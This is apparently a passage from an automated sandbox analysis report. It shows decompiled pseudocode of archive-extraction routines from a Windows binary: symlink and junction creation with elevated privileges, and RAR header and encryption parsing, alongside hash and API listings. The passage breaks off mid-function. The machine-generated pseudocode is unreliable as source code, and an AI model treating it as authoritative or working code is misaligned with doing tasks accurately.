                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                            • API String ID: 797121971-1840816070
                                            • Opcode ID: f36d6b63a03d660dd4d8fe0fe448f3e79730835d467bbdec4edb1d2ee98f3057
                                            • Instruction ID: 275e1687657a0eb68e04a505bdfb6422f0cb1fb9048b525319a5545cbbb6b322
                                            • Opcode Fuzzy Hash: f36d6b63a03d660dd4d8fe0fe448f3e79730835d467bbdec4edb1d2ee98f3057
                                            • Instruction Fuzzy Hash: 48919072648348BBD231DBA1DD49FFF77ACEB89701F000819F64AD2081DB71EA049762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C36FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E00C36FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E00C4D870(E00C6126D, _t242);
				E00C4D940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0xc70043 == 0) {
					E00C37A15(L"SeRestorePrivilege");
					E00C37A15(L"SeCreateSymbolicLinkPrivilege");
					 *0xc70043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E00C36ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E00C3FAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E00C52B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E00C54DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E00C54DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E00C54D7E(_t228, _t232);
				_t116 = E00C52B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E00C39D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E00C3159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E00C54D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E00C54D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E00C3943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00C39A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E00C394DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E00C3A12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E00C3946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E00C36BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E00C3FC98() == 0) {
										E00C31567(_t242 - 0x7c, 0x18);
										_t160 = E00C40A9F(_t242 - 0x7c);
									}
								}
								E00C4E214(_t160);
								E00C36E03(0xc700e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E00C54D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E00C54D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E00C3B4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E00C377F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}
































                                            0x00c36fc6
                                            0x00c36fcb
                                            0x00c36fd5
                                            0x00c36fe7
                                            0x00c36fea
                                            0x00c36ff1
                                            0x00c36ffb
                                            0x00c37000
                                            0x00c37000
                                            0x00c3700b
                                            0x00c3700e
                                            0x00c37013
                                            0x00c37016
                                            0x00c3702d
                                            0x00c37040
                                            0x00c37043
                                            0x00c3704b
                                            0x00c37057
                                            0x00c3705c
                                            0x00c37061
                                            0x00c37063
                                            0x00c37065
                                            0x00c3706a
                                            0x00c3706e
                                            0x00c3707c
                                            0x00c37081
                                            0x00c37086
                                            0x00c3708a
                                            0x00c3708b
                                            0x00c37092
                                            0x00c37098
                                            0x00c37098
                                            0x00c37086
                                            0x00c370a0
                                            0x00c370ac
                                            0x00c370b1
                                            0x00c370b7
                                            0x00c370ba
                                            0x00c370c4
                                            0x00c370fe
                                            0x00c37101
                                            0x00c37102
                                            0x00c37103
                                            0x00c3710f
                                            0x00c37146
                                            0x00c3714c
                                            0x00c3714e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3711a
                                            0x00c3712b
                                            0x00c37134
                                            0x00c372f4
                                            0x00c372f4
                                            0x00c372f8
                                            0x00c372fb
                                            0x00c37309
                                            0x00c37313
                                            0x00c37313
                                            0x00c3713b
                                            0x00c37154
                                            0x00c37154
                                            0x00c3715d
                                            0x00c371c5
                                            0x00c371c8
                                            0x00c371d2
                                            0x00c371d2
                                            0x00c371d5
                                            0x00c371dd
                                            0x00c371e3
                                            0x00c371e6
                                            0x00c371f1
                                            0x00c371f7
                                            0x00c37205
                                            0x00c3720a
                                            0x00c3720d
                                            0x00c37210
                                            0x00c37219
                                            0x00c3722e
                                            0x00c3723c
                                            0x00c3723c
                                            0x00c3723f
                                            0x00c37242
                                            0x00c3725a
                                            0x00c3725c
                                            0x00c37262
                                            0x00000000
                                            0x00000000
                                            0x00c37280
                                            0x00c37286
                                            0x00c37288
                                            0x00c37324
                                            0x00c37335
                                            0x00c37339
                                            0x00c3733c
                                            0x00c37342
                                            0x00c37356
                                            0x00c37369
                                            0x00c3737c
                                            0x00c37387
                                            0x00c37392
                                            0x00c37397
                                            0x00c3739e
                                            0x00c373a4
                                            0x00c373a4
                                            0x00c373af
                                            0x00000000
                                            0x00c373af
                                            0x00c37292
                                            0x00c3729d
                                            0x00c372a2
                                            0x00c372ab
                                            0x00c372bb
                                            0x00c372c2
                                            0x00c372ca
                                            0x00c372ca
                                            0x00c372bb
                                            0x00c372d6
                                            0x00c372df
                                            0x00c372eb
                                            0x00c372ec
                                            0x00c37316
                                            0x00c372ee
                                            0x00c372ee
                                            0x00c372ee
                                            0x00000000
                                            0x00c372ec
                                            0x00c371ca
                                            0x00c371cc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c371cc
                                            0x00c3715f
                                            0x00c37162
                                            0x00c3716a
                                            0x00c37170
                                            0x00c37173
                                            0x00c3717e
                                            0x00c37184
                                            0x00c37192
                                            0x00c37197
                                            0x00c3719a
                                            0x00c3719d
                                            0x00c371a6
                                            0x00c371bb
                                            0x00000000
                                            0x00c371c0
                                            0x00c3710f
                                            0x00c370ca
                                            0x00000000
                                            0x00000000
                                            0x00c370d7
                                            0x00c370dc
                                            0x00c370de
                                            0x00000000
                                            0x00000000
                                            0x00c370ea
                                            0x00c370eb
                                            0x00c370ef
                                            0x00c370f0
                                            0x00c370f8
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C36FCB
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00C3712B
                                            • CloseHandle.KERNEL32(00000000), ref: 00C3713B
                                              • Part of subcall function 00C37A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C37A24
                                              • Part of subcall function 00C37A15: GetLastError.KERNEL32 ref: 00C37A6A
                                              • Part of subcall function 00C37A15: CloseHandle.KERNEL32(?), ref: 00C37A79
                                            • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00C37146
                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00C37254
                                            • DeviceIoControl.KERNEL32 ref: 00C37280
                                            • CloseHandle.KERNEL32(?), ref: 00C37292
                                            • GetLastError.KERNEL32(00000015,00000000,?), ref: 00C372A2
                                            • RemoveDirectoryW.KERNEL32(?), ref: 00C372EE
                                            • DeleteFileW.KERNEL32(?), ref: 00C37316
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                            • API String ID: 3935142422-3508440684
                                            • Opcode ID: d8033a82333e937d498673239c4f8dd99b88807c70e65a4176b1e22bf7952344
                                            • Instruction ID: 2a55d04498b52ad29895b71e547bd9045b4eb06e16db3603c4f5e0652e551ff4
                                            • Opcode Fuzzy Hash: d8033a82333e937d498673239c4f8dd99b88807c70e65a4176b1e22bf7952344
                                            • Instruction Fuzzy Hash: 65B1C1B19142189FEB35DFA4CC45BEE77B8EF08300F0445A9F92AE7142D770AA45DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C330FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00C330FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E00C4D870(E00C611A9, _t544);
				E00C4D940();
				_t394 = _t396;
				E00C3C223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E00C3C42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E00C3C29E(_t544 + 0x30);
						_t531 = E00C3C40A(_t544 + 0x30, 4);
						_t242 = E00C3C39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E00C31EF8(_t394);
							L86:
							E00C3159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E00C3C42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E00C3C37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E00C3C39E(_t498);
						_t250 = E00C3C39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E00C3C39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E00C31901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00C33CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E00C3A96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E00C3C39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E00C3C39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E00C3200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E00C3A8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E00C3C39E(_t500);
									 *(_t539 + 0x1060) = E00C3C39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E00C3C39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E00C40A25(_t539 + 0x1040, _t502, E00C3C29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E00C3C29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E00C3C39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E00C3C39E(_t502);
											_t521 = E00C3C39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E00C3C300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E00C41094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E00C3200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00C52B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00C31F3D(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E00C36BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E00C3C39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E00C3C39E(_t500) & 0x00000001;
										_t335 = E00C3C251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E00C3C300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E00C3C300(_t544 + 0x30, _t394 + 0x2274, 8);
												E00C3C300(_t544 + 0x30, _t544 + 0x64, 4);
												E00C3F524(_t544 - 0x74);
												E00C3F56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E00C3F435(_t544 - 0x74);
												_t350 = E00C4F3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E00C33E41();
										E00C33DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E00C3C39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E00C3C39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00C31EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E00C36E03(0xc700e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00C36BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00C33DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E00C33C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E00C3607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E00C4F3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E00C36BF5(__eflags);
